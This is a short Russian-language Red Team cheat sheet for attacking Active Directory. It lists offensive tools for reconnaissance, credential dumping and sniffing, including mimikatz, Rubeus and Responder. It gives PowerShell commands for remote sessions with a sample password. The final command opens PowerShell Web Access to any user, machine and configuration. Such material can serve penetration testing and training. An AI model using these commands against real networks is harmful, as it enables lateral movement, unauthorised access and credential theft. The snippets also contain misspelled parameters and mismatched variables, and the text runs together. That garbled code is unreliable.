
Шпаргалка Red Team в постоянном расширении.

Вы можете поддержать меня 🐱 :
Эта шпаргалка по атакам на AD, созданная RistBS, вдохновлена репозиторием Active-Directory-Exploitation-Cheat-Sheet.
Инструменты PowerShell:
[⭐] Nishang -> https://github.com/samratashok/nishangNishang содержит множество полезных скриптов для тестирования Windows в среде PowerShell.
PowerView — это скрипт из набора PowerSploit, который позволяет проводить разведку архитектуры AD для возможного латерального перемещения.
Инструменты разведки:
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeНабор инструментов для эксплуатации AD:
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoИнструменты для дампа:
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/RubeusИнструмент для прослушивания:
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session:```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### PSWA Злоупотребление
позволяет любому, у кого есть учетные данные, подключаться к любой машине и любой конфигурации
**[ ! ] это действие требует учетных данных.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *